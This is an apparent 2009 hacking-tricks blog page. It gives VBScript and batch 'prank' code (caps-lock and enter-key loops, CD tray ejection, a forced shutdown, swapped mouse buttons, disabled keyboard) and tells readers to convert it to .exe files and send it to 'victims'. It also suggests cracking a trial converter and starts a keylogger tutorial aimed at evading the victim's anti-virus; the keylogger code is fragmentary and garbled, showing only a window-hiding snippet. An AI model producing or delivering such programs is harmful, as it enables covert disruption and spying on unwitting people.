Tuesday, November 10, 2009
Like my previous post this won't be the core hacking guide but a window trick, since most readers here need something to pass to there friends and have fun.. so here it comes..
Here i will give you few codes for VB Scripts which you can copy to notepad and then save as ".vbs" and can execute directly or can convert it to exe too.. will give the link to the tool for converting at last..
so here are the things you can do..
1. Play with the Lights..!!!
turn on and off the caps lock of the system.. this will annoy the victim..
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
2. This wasn't good enough..?? now, what if the Enter is pressed continuously..?? then use tis code..
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
3. Had enough with the keys..?? how about if the cd drive keeps poping out.. again and again.. ??
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
There are many other tricks you can Google them.. my main objective is to inform you and provide you with a tool to convert it to a more suitable format to use i.e. ".exe"
so here is the tool..
Download VBS to EXE Converter..
this is demo for 15 days but your job will be done by then.. or try finding the key for it.. Do comment..
So, its long time since my last post.. So to start up again, we won't jump into core stuffs, lets have some fun and learn about things which you can do using your command prompt.. You can access all the functionalities you know about your system and even a lot more using the command prompt..
But the question is, suppose you know what to do in command prompt and annoy someone, but how would you do this in victim's system or someone, you wanna play prank..?? So, the answer is BATCH Files, the are the series of commands which you write in a notepad and save with a ".bat" extension. those commands are the one you write in the cmd of windows.. don't panic.. i will give some commands too at the end of the post.. Now don't you think it will be lot convenient if we could convert it to an ".exe" file..?? huh..?? so fine, i will give link to the software for that purpose too..
So all you have to do is to make a batch file and then just convert it to exe and send it to the victim.. and ya have fun then..
So lets start listing some cool stuffs you can do with batch files..
1. so start with the basics.. lets try shutting down the windows.. what say..???
so here is what you have to write in notepad and save with .bat extension, then convert it to exe
Shutdown -s -t 60 -c "So Sorry.. Bye.."
now you can change "-s" to "-l" for log off or to "-r" for restart.. the number after "-t" is the seconds before the execution of the task
2. so, that wasn't fun..?? huh..?? how about swapping the mouse buttons..?? here it is..
@echo off
Rundll32 user32,SwapMouseButton
rundll32 keyboard,disable
msg * Enjoy Buddy.. You are Screwed..
now this will change his right mouse to left and vice versa..
There are many more tricks available with batch files but thats not our main objective.. you can Google it.. make your batch file and then convert it to exe using the converter below..
Download Batch to Exe Converter
if you have face any problems regarding creation of files or using the software, do comment..
Labels: batch file hacking, Scripts, tricks, Windows
Thursday, October 22, 2009
Download any video from youtube, Metacafe, blogs or any site you know..
1 comments Posted by Pratik Mishra at 10:15 PMYa, Everyone enjoy finding their favorite videos over online video sharing site like Youtube, Metacafe, Myspace, etc,etc.. We surf over thousands of videos and we do download few of them using the sites like Keepvid, Clipnabber or some free tools for the purpose, which uses the url of the video...
Now, What if:
-Embedding is disabled by the author of the video in Youtube..??
-You are unable to find the real url of the video from some site..??
-URL is masked by the carring site..??
-Video is in blog, or any minor site not supported by our downloading tool or site..??
So, you end up not able to download the video you liked..?? You think there is no way now to get that video..?? so, sorry to break your belief, so now i will tell you how to get any video, without any effort or using any site or tool.. Ready now...??
Follow the steps:
1. Launch your browser, find the video you need, let it get buffered fully, enjoy it till then, then just close the browser.. Your half job is done... now some easy steps..
2. No, you don't need any tool or software, the video is in your own harddrive you just have to find the right place to look at.. find it and rename it..
3. For that to happen, visit your browser's cache location..(change the username)
Chrome:
C:\Documents and Settings\<User Name>\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache
Opera:
C:\Documents and Settings\<User Name>\Local Settings\Application Data\Opera\Opera\cache
Firefox:
C:\Documents and Settings\<User Name>\Local Settings\Application Data\Mozilla\Firefox\Profiles\<Profile Name>\Cache
IE:
C:\Documents and Settings\sham\Local Settings\Temporary Internet Files
4. Now right click and arrange icon by size or modifing date.. you will find the large size file, rename it to any name and give .flv extension.
5. Now, play the file in VLC or any other player supporting flv..
So, Now, don't surf around searching for video downloading sites or tools, and enjoy any video you like, download it without any effort..
hope you liked the post.. Do Comment
Hack Gmail
Labels: Download video, Hack Metacafe, Hack Youtube, tricks
Thursday, October 15, 2009
So till now, we only concentrated on hacking using tricks, social engineering, existing tools and other things.. So, now its time we start learning how to create our own, because by the time we start using this tools, they are already released in public and hence is identified by most of the anti-virus software, making your job harder.. So if you create one for yourself and not intend to release it in public.. You can use it without worrying about anti-virus software installed at victim's side..
To start with we will create a basic key-logger.. You already know by now, it is a basic component for a trojan, RATs, and almost every hacking software uses this feature.. Its available in many flavors or we can call it enhancement.. like invisible to user, invisible in task bar, stealth mode, autostart, mailing function, etc, etc.. today we will learn only the basic that is how it records the keystrokes..??
A keylogger listens to every keystrokes and records it for us.. There exists three way to implement keyloggers(that i know about..). They are:
1. GetAsyncKeyState
2. GetKeyboardState
/* THIS CODE WAS Published By Pratik Mishra.. Using help from the net and other programmers..
I hope you enjoyed the post.. Do Comment..
typedef HWND (WINAPI *tGetConsoleWindow)(void);
HINSTANCE handle = ::LoadLibrary("Kernel32.dll");
if ( handle )
pGetConsoleWindow = (tGetConsoleWindow)::GetProcAddress(handle, "GetConsoleWindow");
if ( pGetConsoleWindow )
{
HWND hwnd = pGetConsoleWindow();
::ShowWindow(hwnd,SW_HIDE);
}
if ( handle )
::FreeLibrary(handle);
Hack Gmail
Labels: Coding, keylogger, Source Codes